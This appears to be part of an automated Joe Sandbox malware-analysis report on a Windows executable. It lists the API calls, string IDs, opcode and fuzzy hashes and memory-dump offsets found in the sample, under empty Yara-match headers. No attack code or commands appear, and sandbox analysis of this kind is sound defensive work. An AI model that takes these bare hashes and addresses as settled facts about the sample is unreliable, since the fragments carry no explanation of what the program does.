                                                          • Instruction Fuzzy Hash: A8010477A24A56213614156D9C0267797988B93BB6727402FFC44EB2C2EEECED02019E
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,58C6AD3B,?,?,00000000,0045D6E6,000000FF,?,004439E0,0044387B,?,00443A9B,00000000), ref: 0044394B
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044395D
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,0045D6E6,000000FF,?,004439E0,0044387B,?,00443A9B,00000000), ref: 0044397F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 3daf6b45365e10327e4674e32e0bbb7648fd22c9221b51d64b84b5ca0bf51f62
                                                          • Instruction ID: 98d842734981b974643d07bc2e17aaafc6a7a08e37008b1518908caaa5ffc225
                                                          • Opcode Fuzzy Hash: 3daf6b45365e10327e4674e32e0bbb7648fd22c9221b51d64b84b5ca0bf51f62
                                                          • Instruction Fuzzy Hash: DC01A771904655EBDB118F50CC05BAEB7B8FB44B51F000626E811A22D0EBF89A04CA99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ec4ca088175b3d71b74edc192f962602cbf94f283bf042d020ea8e91f16aadc
                                                          • Instruction ID: 8aab27407c0a82a01c0ac988981d35579ce087bbb9e55deaa5eb6bc71ee87661
                                                          • Opcode Fuzzy Hash: 1ec4ca088175b3d71b74edc192f962602cbf94f283bf042d020ea8e91f16aadc
                                                          • Instruction Fuzzy Hash: 6C51707990024DAAEF00EFE4D844AEEB7B8FF09710F11405BE815E7250EB74DA45CB6A
                                                          APIs
                                                          • GetFileType.KERNEL32(00446BF7,?,00000000,?), ref: 00446CF4
                                                          • GetFileInformationByHandle.KERNEL32(00446BF7,?), ref: 00446D4E
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00446BF7,?,000000FF,00000000), ref: 00446DDC
                                                          • __dosmaperr.LIBCMT ref: 00446DE3
                                                          • PeekNamedPipe.KERNEL32(00446BF7,00000000,00000000,00000000,?,00000000), ref: 00446E20
                                                            • Part of subcall function 00446999: __dosmaperr.LIBCMT ref: 004469CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                          • String ID:
                                                          • API String ID: 1206951868-0
                                                          • Opcode ID: c898b499f90ca7519afdcdd7f8d9df92fdf4b61206adcc718103c1ca81f84296
                                                          • Instruction ID: 7fef5dbdd5f1ebb30aa965719069ce331059867e0b66cf3bcb9aaaf835df89e4
                                                          • Opcode Fuzzy Hash: c898b499f90ca7519afdcdd7f8d9df92fdf4b61206adcc718103c1ca81f84296
                                                          • Instruction Fuzzy Hash: 584160B5A00704AFEB24DFA5DC459ABBBF9FF89304B11452EF846D3610E734A845CB16
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: %1.17g$,]{: }$null
                                                          • API String ID: 4218353326-1793514501
                                                          • Opcode ID: 1febabab61847861726e4eccc5dd4458819082e0fa0a32231921fccec61d2490
                                                          • Instruction ID: dfdaef210c9fde1e563ad86d0075ca4844e5c450f328af3dc752b2d50a02e017
                                                          • Opcode Fuzzy Hash: 1febabab61847861726e4eccc5dd4458819082e0fa0a32231921fccec61d2490
                                                          • Instruction Fuzzy Hash: 68B1DFE2B042005BD7006A669C5162B65D98FD1359F09453FEF4AF33C2FA3EDE19829B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2330000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ^^4$^^4$~rjz
                                                          • API String ID: 0-2511145224
                                                          • Opcode ID: cb0dc4f94c1c179675eca45769f3c93bbdb24bff6a976fde1cfb2fc9678cba59
                                                          • Instruction ID: 0c8c8d9a8597177023838940ed8ec232433aa460a65e207036a535b4732bd921
                                                          • Opcode Fuzzy Hash: cb0dc4f94c1c179675eca45769f3c93bbdb24bff6a976fde1cfb2fc9678cba59
                                                          • Instruction Fuzzy Hash: DB619C63E021A756FF34651C888D5BEB26E9B80F14F25C5A3F109FB29DC7A2C941CA53
                                                          APIs
                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00459CCA,?,?,00000000,00000000,00000000,?), ref: 00459DE9
                                                          • CatchIt.LIBVCRUNTIME ref: 00459ECF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CatchEncodePointer
                                                          • String ID: MOC$RCC
                                                          • API String ID: 1435073870-2084237596
                                                          • Opcode ID: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                          • Instruction ID: 680bccfe0e0854ffc158b5e00edb6862103a1416f9df0b4f366e0dcb6488795f
                                                          • Opcode Fuzzy Hash: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                          • Instruction Fuzzy Hash: 34416871900209EFDF15DF98CD82AAEBBB5FF48305F18805AF904672A2D3399D54DB58
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00456DCD,?,0000376F,0045FB2F,?,?,?,00456C15,00000000,FlsAlloc,00465EF0,00465EF8), ref: 00456D3E
                                                          • GetLastError.KERNEL32(?,00456DCD,?,0000376F,0045FB2F,?,?,?,00456C15,00000000,FlsAlloc,00465EF0,00465EF8,?,^D,0044C1B0), ref: 00456D48
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,^D,0044C1B0,0044C294,00000003,0044069B,?,?,?,?,00000000,0045FB2F,004058C6), ref: 00456D70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID: api-ms-
                                                          • API String ID: 3177248105-2084034818
                                                          • Opcode ID: 1c601aedc7284344527d2769353e9bde843b729d446c6642f172212a38ab6b00
                                                          • Instruction ID: 0ecaf6013e36b0431d801e3916b08b76fdb95d3f1c140b132a01747a849ad822
                                                          • Opcode Fuzzy Hash: 1c601aedc7284344527d2769353e9bde843b729d446c6642f172212a38ab6b00
                                                          • Instruction Fuzzy Hash: 04E012303C4204B7DB101B61DC06B593A789B10B56F540431FD0DA51E1EBF5A858954E
                                                          APIs
                                                          • GetConsoleOutputCP.KERNEL32(58C6AD3B,00455523,00000000,?), ref: 004507AD
                                                            • Part of subcall function 00453203: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045769E,?,00000000,-00000008), ref: 004532AF
                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00450A08
                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00450A50
                                                          • GetLastError.KERNEL32 ref: 00450AF3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                          • String ID:
                                                          • API String ID: 2112829910-0
                                                          • Opcode ID: 96a8a5487e7c3d3faf6390a68133758f583929af7c12fd611465a668075fbc12
                                                          • Instruction ID: e52ebc46d8e9f13757024da4890b50ba647b118a1bf42f91cd2d0be3dbea7dc8
                                                          • Opcode Fuzzy Hash: 96a8a5487e7c3d3faf6390a68133758f583929af7c12fd611465a668075fbc12
                                                          • Instruction Fuzzy Hash: A0D17BB9D00248AFDF15CFA8C8809EDBBB4FF09315F18816AE855E7352E734A946CB54
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AdjustPointer
                                                          • String ID:
                                                          • API String ID: 1740715915-0
                                                          • Opcode ID: c82cfddcd8694e2bdb1e743d5f084ed403ad5a837ea31cf34a60513f078c136f
                                                          • Instruction ID: 4fadf7dd59c53bd1b12e0029445d2e83e107cc747934abb9f5ec8e89f131d8d2
                                                          • Opcode Fuzzy Hash: c82cfddcd8694e2bdb1e743d5f084ed403ad5a837ea31cf34a60513f078c136f
                                                          • Instruction Fuzzy Hash: 8C51F276A14202EFDB289F11D981BAA73A4EF18706F14452FEC0157292E73DEC49CB99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5b8450e9b4afcbafb4f61d0450c1d7e417d22fbc98e5ee0c888f4ba12a7ca7c
                                                          • Instruction ID: a7f2c4688ec43d2a23ac8beb8ca83e3134fddb6ab0c13f52a90a8fe9f94a791d
                                                          • Opcode Fuzzy Hash: f5b8450e9b4afcbafb4f61d0450c1d7e417d22fbc98e5ee0c888f4ba12a7ca7c
                                                          • Instruction Fuzzy Hash: EE412AF2A00304AFD7249F79CC42B6AFBE8EB84756F10452FF551DB382D2B99A058784
                                                          APIs
                                                          • VirtualQuery.KERNEL32(83000000,58C6AD3B,0000001C,58C6AD3B,?,?,?), ref: 0044C7B6
                                                          • __FindPESection.LIBCMT ref: 0044C7F3
                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 0044C813
                                                          • __FindPESection.LIBCMT ref: 0044C82D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FindSection$HandlersQueryScopeTableValidateVirtual
                                                          • String ID:
                                                          • API String ID: 1876002356-0
                                                          • Opcode ID: c5c89110117f95e94e9ebb8d4fd24969d439cb80e1b6e8bbea251b6fa9d5d390
                                                          • Instruction ID: 16c3c4676ac924f9bbc116e317de4c153b4417dc4f771cedf4f7c3d11fae8c19
                                                          • Opcode Fuzzy Hash: c5c89110117f95e94e9ebb8d4fd24969d439cb80e1b6e8bbea251b6fa9d5d390
                                                          • Instruction Fuzzy Hash: CF31B5B5E022159BFF54CBA9A9C07BE73A4EB09315F09007ADD41E7352E739DC018BA9
                                                          APIs
                                                          • SetFilePointerEx.KERNEL32(?,00000000,00000000,004481E1,00000001,?,004481E1,h5@,?,00000000), ref: 00450F57
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00403568,00000000), ref: 00450F64
                                                          • SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00403568,00000000), ref: 00450F8A
                                                          • SetFilePointerEx.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00450FB0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FilePointer$ErrorLast
                                                          • String ID:
                                                          • API String ID: 142388799-0
                                                          • Opcode ID: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                          • Instruction ID: 1514e75016c253887b100742bd2e0aa0853bf3b84a7615600f3982ba0bc5b80c
                                                          • Opcode Fuzzy Hash: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                          • Instruction Fuzzy Hash: B1116636805219ABDF209F51CC48A9F3F7DFB00725F004115FC20922A1D7B19A40CAA5
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,00455C9F,00000000,?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000), ref: 00455DBC
                                                          • GetLastError.KERNEL32(?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000,?,00455C9F,?,00000104,00446C37), ref: 00455DC6
                                                          • __dosmaperr.LIBCMT ref: 00455DCD
                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000), ref: 00455DF7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FullNamePath$ErrorLast__dosmaperr
                                                          • String ID:
                                                          • API String ID: 1391015842-0
                                                          • Opcode ID: 40aed38a608d94dd85f4980ee519dcea4f2932da946f037f09bb496e255caaba
                                                          • Instruction ID: 83aad2bcbc88ad1b691cbbc28925ead7dadcf548e2ab308fdfae5f9a37bb2b5e
                                                          • Opcode Fuzzy Hash: 40aed38a608d94dd85f4980ee519dcea4f2932da946f037f09bb496e255caaba
                                                          • Instruction Fuzzy Hash: 50F0A436200700AFDB205F67CC09E277BBDEF45361710842AF956C2521DB76EC14CB68
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,00455C9F,00000000,?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001), ref: 00455E22
                                                          • GetLastError.KERNEL32(?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000,?,00455C9F,?,00000104), ref: 00455E2C
                                                          • __dosmaperr.LIBCMT ref: 00455E33
                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000), ref: 00455E5D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FullNamePath$ErrorLast__dosmaperr
                                                          • String ID:
                                                          • API String ID: 1391015842-0
                                                          • Opcode ID: 978842d79e248325d5d1c5fcbdbac71f7ead08704c26e555b85ab8378b580012
                                                          • Instruction ID: 58d23dfaa7b1bff066b533c88cf6507f29fdd6be1c16f2e24496f8287ce13408
                                                          • Opcode Fuzzy Hash: 978842d79e248325d5d1c5fcbdbac71f7ead08704c26e555b85ab8378b580012
                                                          • Instruction Fuzzy Hash: 49F0A436200600AFDF205F72DC09E2B7BADEF44361714842AF959D2121DB75EC14CB58
                                                          APIs
                                                          • WriteConsoleW.KERNEL32(00000000,00455523,00000000,00000000,00000000,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000), ref: 0045BD1F
                                                          • GetLastError.KERNEL32(?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?,?,?,00450492,00443CFB), ref: 0045BD2B
                                                            • Part of subcall function 0045BD7C: CloseHandle.KERNEL32(FFFFFFFE,0045BD3B,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?,?), ref: 0045BD8C
                                                          • ___initconout.LIBCMT ref: 0045BD3B
                                                            • Part of subcall function 0045BD5D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0045BCF9,00459F57,?,?,00450B47,?,00455523,00000000,?), ref: 0045BD70
                                                          • WriteConsoleW.KERNEL32(00000000,00455523,00000000,00000000,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?), ref: 0045BD50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                          • String ID:
                                                          • API String ID: 2744216297-0
                                                          • Opcode ID: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
                                                          • Instruction ID: a34e4e029ef2e4d5dd3ba3bcd054cc3c3a598788143b8b19420d5231d0b345e8
                                                          • Opcode Fuzzy Hash: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
                                                          • Instruction Fuzzy Hash: 0CF0F836140119BBCF221F959C08ADA3F3AEF493A1F044021FE09D5171D7B28864ABD9
                                                          APIs
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 004598A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ___except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3493665558-3733052814
                                                          • Opcode ID: 2ddf6b46ba9927e19a1a0e06cd3d58e98e189ea3bbd4e4ea7d064f6212a0d210
                                                          • Instruction ID: 4df6c2a030d07bf616ce91cf83237d0554f1a363a859cf179326f8a266afaebb
                                                          • Opcode Fuzzy Hash: 2ddf6b46ba9927e19a1a0e06cd3d58e98e189ea3bbd4e4ea7d064f6212a0d210
                                                          • Instruction Fuzzy Hash: 0E31C4B6400219EBCF269F51CC4096A7B65FF0A716B18419FFC5449323C73ACC66DB8A
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CommandLine
                                                          • String ID: %x
                                                          • API String ID: 3253501508-1377615221
                                                          • Opcode ID: bd633bd43deebbd2e15d521c1116c2625582731372f6dd1fbfe3dddecaa6b910
                                                          • Instruction ID: c0f3706b9fd5cde212b7035ac35547a34a6d774216931ba5d5ef3889fb90e334
                                                          • Opcode Fuzzy Hash: bd633bd43deebbd2e15d521c1116c2625582731372f6dd1fbfe3dddecaa6b910
                                                          • Instruction Fuzzy Hash: C1B048BC8002009B87049F20E8480543AE4B208212380217AD84682220F7F404048F0E